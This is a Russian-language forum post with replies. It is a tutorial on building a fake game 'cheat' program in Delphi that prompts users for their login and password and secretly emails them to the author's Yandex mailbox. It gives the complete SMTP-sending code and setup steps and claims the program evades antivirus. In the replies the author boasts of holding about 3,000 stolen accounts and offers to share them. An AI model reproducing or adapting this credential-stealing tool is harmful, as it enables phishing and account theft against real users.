Статья: как взломать аккаунт

Авторизация

• Автор

Как взломать аккаунты лохов.
    Добрый день, довольно часто я видел на этом форуме сообщения с текстом «Посоны я нашел рабочую накрутку для тюряги атвечаю робит вот ссылка» , После прочтения моей статьи вы научитесь создавать программы как на скриншоте ниже, они будут отправлять вам чужие логины и пароли.
    image
    Писать мы будем на Delphi вот ссылка на скачивание (вы можете конечно найти сами, но если скачаете по моей ссылки я получу копеечку от партнерки, это будет лучшим спасибо, вы ничего платить не должны…) пока качаеться делфи идем на yandex.ru и регаем 2 почты с разными паролями!
    И так открываем Delphi , если вы скачали моей архив то идем по адресу Borland\Delphi7\Bin\ и открываем delphi32.exe
    Вот так выглядит Delphi….
    image
    1-форма
    2-object инспектро
    3- вкладки с компонентами
    Далее нужно придать программе красивый внешний вид, идем в гугл и ищем картинки например на тему тюряги. Теперь займемся настройкой формы. Задаем форме размер на свой вкус (мыщкой берем за край и тащим чтоб поменьше стала)
    Теперь идем на вкладку с компонентами , переходим на вкладку additional , щелкаем левой кнопкой по компоненту image и щелкаем левой кнопкой по форме. Идем в object инспектор, ищем параметр picture , жмем по трем точечкам и загружаем туда вашу картинку, она будет фоном вашей программы(помоему поддерживаються расширения jpg,jpeg . png картинку неполучиться поставить для этого нужно устанавливать доп компоненты, неохото обьяснять)
    В object инспекторе ФОРМЫ меняем параметр captions на что то типо «turaga-cheat»
    В итоге получаеться вот такая форма
    image
    Я надеюсь что на этом этапе у вас все получилось, идем дальше, бросаем на форму 2 компонента edit 2 компонета label и компонент button все они находяться на кладке standard у компонентов label меняемя в object инспекторе параметр captions на логин и пароль. У компонента button меняем этот же параметр на “накрутить” или “получить” импровезируйте кароче
    размещаем элементы примерно как у меня на картинке.
    image
    Форма почти готова, бросьте на нее несколько чек боксов с вкладки стандарт, и дайте им имена например ‘1000рублей’ ‘99999папирос’ и тд , мыло и прочую фигню, не помню что там еще есть…
    ВАЖНО еще нужно кинуть на форму idsmtp со вкладке indy client и поставить в object инспекторе второй параметр на atLogin (в выпадающем списке найдете) и компонент idmessage со вкладки indy misc, их можете расположить где угодно, их не будет видно в вашей программе но без этих компонентов НИЧЕГО НЕБУДЕТ РАБОТАТЬ.
    Осталось вставить код, кароче жмем на кнопку на форме 2 раза(кнопка которой вы давали имя накрутить) откроеться такое окно,
    image
    между бегин и енд будет распологаться код.

if edt1.Text='' then
    begin
    showmessage('вы не ввели логин');
    end else begin
    if edt2.text='' then
    begin
    showmessage('вы не ввели пароль');
    end else begin
    idmessage1.Recipients.emailaddresses:='%(red)[ПОЛУЧАТЕЛЬ]@yandex.ru';
    idmessage1.From.Text:='%(red)[ОТПРАВИТЕЛЬ]@yandex.ru';
    idmessage1.body.text:=edt1.text+':'+edt2.text;
    idmessage1.subject:='%(red)[ТЕМА]';
    idmessage1.ContentType:='text/plain';
    /////
    idSmtp1.username:='%(red)[ОТПРАВИТЕЛЬ]@yandex.ru';
    idSmtp1.Password:='%(red)[ПАРОЛЬ ОТПРАВИТЕЛЯ]';
    idsmtp1.Host:='smtp.yandex.ru';
    idsmtp1.Port:=25;
    idsmtp1.Connect(60000);
    idSmtp1.Send(IdMessage1);
    idSmtp1.Disconnect;
    showmessage('готово! Результат прийдет в течении суток, вы получите ');
    end;
    end;

Копируем этот код и вставляем между бегин и енд
    image
    Теперь ищем в коде слова”отправитель” получатель и пароль от отправителя , и кароче меняем их на данные от ваших двух яндекс почт, которых я просил вас зарегать в самом начале. На почту получатель будут приходить чужие логины и пароли. Теперь осталось сохранить вашу программу, идем в гугл ищем иконку с расширением ICO на тему тюряга , скачиваем. В делфи жмем project-options переходим на вкладку applications жмем лоад ico и загружаем вашу иконку. Все жмем файл сайв all и сохраняем все в пустую папку, жмем project-compile all project , если у вас ошибка значит начинаете все сначала 😃 если все ок закрываем делфи, идем в папку в которую вы все сохранили, там ищем файл с расширением exe и иконкой которую вы поставили, его перекидываете на рабочий стол, это фаша фейк программа, проверяете ее на работоспособность, про то как выкладывать ее в интернет и рекламирывать писать небуду, скажу только одно, этот фейк можно легко декомпилировать и посмотреть вашу данные от почты, именно так я буду делать если увижу на этом форуме темы «Посоны вот рабочая накрутка для тюряги» все на этом статься заканчиваеться, в заключении хочеться сказать что созданная вами программа НЕ палиться антивирусами. При желании можно создать очень красивые и реалистичные фейки, вот скрины моих программ…
    http://allods***/ris/cheat.png
    image
    В коменты пишите на каком этапе вам непонятно, постараюсь помочь и обьяснить, у кого все получилось тоже отписывайтесь)
    видео

• Ctrl+V

• х у и т а.в СУД НА ТЕБЯ НАДО ПОДАТЬ!:fu:

• Не норм по сути,но щас только убогий школьник поведется на это :net: :):

• Автор

х у и т а.в СУД НА ТЕБЯ НАДО ПОДАТЬ!:fu: 

за что ?

• 

Плюсую!

• Автор

Не норм по сути,но щас только убогий школьник поведется на это :net: :): 

у меня уже около 3к разных акков набралось, можно раздачу устроить

• Xuyase :): V zakladki :):

• Автор

Плюсую!

неожидал такой реакции((

• вы тупицы,вам объяснили как сделать,а не осуждать его за то что он наглядно разъяснил как вас кидали!

• Создай видеоролик лучше!

• Автор

Создай видеоролик лучше!

микрофона нету, могу без голоса создать, там делать минуты 3

• давай) Только медленно!

• пацан норм вообще темку сделал)щас поприкалываюсь)))

• накрутка недоступнА*

Авторизация